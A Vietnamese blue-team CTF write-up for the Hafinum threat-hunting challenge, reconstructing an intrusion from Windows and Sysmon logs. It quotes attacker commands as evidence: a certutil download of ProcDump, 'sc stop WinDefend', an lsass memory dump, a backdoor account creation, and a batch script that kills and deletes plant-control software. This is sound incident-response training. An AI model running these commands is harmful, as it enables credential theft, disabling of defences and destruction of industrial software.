# [Threat Hunting] Hafinum-APT blue team ctf
:::info
:bulb: Các file được cung cấp:
- winevt.zip: windows event logs
- c83-HAFINUM.ova: file import VM setup môi trường SIEM ELK (http://127.0.0.1:5601 - không cần đăng nhập)
- Công cụ sử dụng:
(+) Hayabusa: https://github.com/Yamato-Security/hayabusa
- Difficulty: Medium
- Link: https://cyberdefenders.org/blueteam-ctf-challenges/103#nav-questions
- Truy vết thông qua raw - Windows Event Logs hoặc SIEM đều thu được kết quả như nhau
:::
### :small_blue_diamond: **Date:12/06/2023**
## :dart: Bối cảnh
:::success
Các chuyên gia tại nhà máy sản xuất linh kiện điện tử phát hiện các hành vi bất thường từ một địa chỉ IP public, nghi ngờ hệ thống CNTT của nhà máy bị tấn công. Đóng vai trò chuyên gia xử lý sự cố, điều tra truy vết tìm ra nguyên nhân sự cố.
:::
## :heavy_check_mark: Questions
### 1. What is the name of the threat detected by Windows Defender?
#### Answer: Trojan:Win32/Ceprolad.A
Kiểm tra trong log của Windows Defender (Microsoft-Windows-Windows Defender/Operational) Event ID 1116
```
3/12/2021 3:17:55 PM
Name: Trojan:Win32/Ceprolad.A
C:\Windows\System32\certutil.exe -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip procdump.zip
User: NT AUTHORITY\SYSTEM
Computer: PoopController
```
> KQL: event.code:1116 AND winlog.event_data.FWLink:*
Kẻ tấn công sử dụng built-in của Windows certutil để download file [Procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) (công cụ nằm trong bộ công cụ Sysinternal phát triển bởi Microsoft, thường được lợi dụng để [dump tiến trình](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz) lsass.exe trong quá trình tấn công nhằm trích xuất thông tin tài khoản xác thực trong máy chủ/máy trạm bị chiếm quyền điều khiển)
### 2. What was the full URL that Windows Defender blocked an archive from being downloaded?
#### Answer: https://download.sysinternals.com/files/Procdump.zip
Bên cạnh logs của Windows Defender, logs Sysmon - EventID 1 (Microsoft-Windows-Sysmon/Operational) và Security - EventID 4688 (trong TH cấu hình đầy đủ audit policy) cũng sẽ lưu lại câu lệnh thực thi của kẻ tấn công
### 3. What was the full command used by the attacker to successfully download the archive?
#### Answer: certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/Procdump.zip" procdump.zip
```
Process Create:
Event ID: 1
UtcTime: 2021-03-12 08:23:47.391
ProcessId: 8884
Image: C:\Windows\System32\certutil.exe
OriginalFileName: CertUtil.exe
CommandLine: certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/Procdump.zip" procdump.zip
CurrentDirectory: C:\windows\system32\
User: POOPCONTROLLER\Administrator
LogonGuid: {93524514-2033-604b-5a53-cc0000000000}
LogonId: 0xCC535A
TerminalSessionId: 3
IntegrityLevel: High
Hashes: MD5=E376B07AA887A6085CEAE9BE62AC9C37,SHA256=48922BB6498C432DD248CD337F4DCEE0BFE77EE3ECBB1F8020D6DB1F135E8E00,IMPHASH=683B8A445B00A271FC57848D893BD6C4
ParentProcessGuid: {93524514-2453-604b-cd04-000000000900}
ParentProcessId: 4648
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe"
```
### 4. Which user account was the attacker using when the archive was successfully downloaded to the host?
#### Answer: Administrator
### 5. What command was used by the attacker on the host to try and disable Windows Defender via the command line?
#### Answer: sc stop WinDefend
```
Process Create:
Event ID: 1
UtcTime: 2021-03-12 08:20:49.500
ProcessId: 5900
Image: C:\Windows\System32\sc.exe
OriginalFileName: sc.exe
CommandLine: sc stop WinDefend
CurrentDirectory: C:\windows\system32\
User: POOPCONTROLLER\Administrator
IntegrityLevel: High
Hashes: MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
ParentProcessId: 4648
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe"
```
### 6. Provide the date and time when Windows Defender's real-time protection was disabled. (24H-UTC)
#### Answer: 2021-03-12 08:21:35 UTC
Kiểm tra event ID `5001 - Windows Defender Antivirus Real-time Protection scanning for malware and other potentially unwanted software was disabled` trong log Microsoft-Windows-Windows Defender/Operational
### 7. Which version of ProcDump did the attacker run on the host?
#### Answer: 10.0
Từ sysmon sẽ có được thông tin của file thực thi procdump
"CommandLine": "procdump -ma lsass.exe lsass.dmp",
"ParentCommandLine": "\"C:\\windows\\system32\\cmd.exe\" ",
"Image": "C:\\tmp\\procdump.exe",
"Product": "ProcDump",
"User": "POOPCONTROLLER\\Administrator",
"RuleName": "-",
"FileVersion": "10.0",
"CurrentDirectory": "c:\\tmp\\",
"Hashes": "MD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E",
"UtcTime": "2021-03-12 08:29:25.729",
"ParentProcessId": "4648",
> KQL: event.code:1 AND winlog.event_data.Image : *procdump*
### 8. Where is the executable located on the disk that was targeted by Procdump to dump its process memory?
#### Answer: C:\windows\system32\lsass.exe
### 9. What was the location of the dump file created from the process dumped with Procdump?
#### Answer: C:\tmp\lsass.dmp
Kiểm tra event ID 11 của sysmon: File Created
### 10. Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.
#### Answer: D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B
```
Process Create:
RuleName: -
UtcTime: 2021-03-12 13:01:06.790
ProcessId: 3180
Image: C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FileVersion: 15.15.5.0
Description: TeamViewer
Product: TeamViewer
Company: TeamViewer Germany GmbH
OriginalFileName: TeamViewer_Service.exe
CommandLine: "C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"
CurrentDirectory: C:\windows\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {93524514-660a-604b-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=7B1B9039FED3AB2B6FD24E6F046D0E52,SHA256=D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B,IMPHASH=E48F1FCD9590178AE7A76FB41C5B36D0
ParentProcessGuid: {93524514-660a-604b-0b00-000000000a00}
ParentProcessId: 696
ParentImage: C:\Windows\System32\services.exe
ParentCommandLine: C:\windows\system32\services.exe
```
### 11. What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?
#### Answer: router7.teamviewer.com
```
Dns query:
RuleName: -
UtcTime: 2021-03-10 04:40:51.316
ProcessGuid: {93524514-4dcc-6048-f100-000000000500}
ProcessId: 3232
QueryName: router7.teamviewer.com
QueryStatus: 0
QueryResults: type: 5 routerpool7.rlb.teamviewer.com;::ffff:37.252.253.104;::ffff:188.172.198.137;::ffff:178.255.155.179;::ffff:213.227.168.147;::ffff:217.146.13.133;
Image: C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
```
### 12. Determine how the attacker gained access to the Administrator account.
#### Answer: brute-force attack
Từ các logs liên quan đến đăng nhập (4625,4625) sẽ pát hiện hành vi bruteforce tài khoản Administrator từ 1 địa chỉ IP public 8.36.216.58
### 13. What IP address can we send to the Firewall team for blocking?
#### Answer: 8.36.216.58
Kiểm tra event ID 4624,4625 (Logon success/Logon Fail) - Security log
Kiểm tra event ID 3 - Network Connection - Sysmon log
### 14. What was the hostname from where the attacker launched their attack?
#### Answer: FancyPoodle
### 15. Provide the first timestamp from the logs where you can see the attacker was successful login. (24H-UTC)
#### Answer: 2021-03-11 20:26:52 UTC
### 16. Provide the data in UTC time of when the attacker successfully logged into the host using RDP for the first time. (24H-UTC)
#### Answer: 2021-03-12 08:03:00
> KQL: event.code : "4624" and winlog.event_data.LogonType :10 AND winlog.event_data.IpAddress: 8.36.216.45
Logon Type RDP: 10
Event ID 21 - Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
### 17. When did the attacker log off from the first RDP session? (24H-UTC)
#### Answer: 2021-03-12 08:45:02
Event ID 23 - Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
### 18. What command did the attacker run on the host which would've helped him understand what Antivirus software was running on the system?
#### Answer: tasklist
### 19. Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?
#### Answer: ipconfig /all
### 20. What was the name of the user account added by the attacker?
#### Answer: Administrator1
`net user /add Administrator1 password!@#!@#`
### 21. Based on information from the public, the first visual signs of raw sewage spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?
#### Answer: backwash.bat
Event ID 15 - Sysmon sẽ thu được thông tin về file bat, được download từ Chrome và nội dung của file bat
### 22. Which application was responsible for downloading the malicious file to the host?
#### Answer: Chrome.exe
### 23. From which website was this malicious file downloaded?
#### Answer: wetransfer.com
```
File stream created:
RuleName: -
UtcTime: 2021-03-12 11:09:03.439
ProcessGuid: {93524514-4bce-604b-fa05-000000000900}
ProcessId: 7048
Image: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetFilename: C:\Users\Administrator\Downloads\backwash.bat:Zone.Identifier
CreationUtcTime: 2021-03-12 11:08:52.011
Hash: MD5=36646BB273E0D8AEB082B302F21CAFE5,SHA256=643FC170C93F6D7D597A383D6FBFCE7E83196DF8AE7822F59FC45F58ECC00D09,IMPHASH=00000000000000000000000000000000
Contents: [ZoneTransfer] ZoneId=3 ReferrerUrl=https://wetransfer.com/
```
### 24. After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?
#### Answer: C:\backwash.bat
```
Image: C:\windows\system32\DllHost.exe
TargetFilename: C:\backwash.bat
```
### 25. Based on the available logs, there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host. (24H-UTC)
#### Answer: 2021-03-12 11:10:03
### 26. What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode
#### Answer: C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no
```
"C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no" timeout /t 30 /nobreak taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"
```
### 27. Prior to switching to a manual override, the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker's script would have rendered the application unusable?
#### Answer: DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3
## :triangular_flag_on_post: Summary
:::success
Thông qua bruteforce thành công tài khoản administrator, kẻ tấn công có thế truy cập vào hệ thống và thực thi các câu lệnh nhằm enum hệ thống, disable windows def, dump tiến trình lsass và tải xuống thêm các file độc hại.
:::
###### tags: `ThreatHunting` `SIEM-ELK`
Sign in with Wallet
Connect another wallet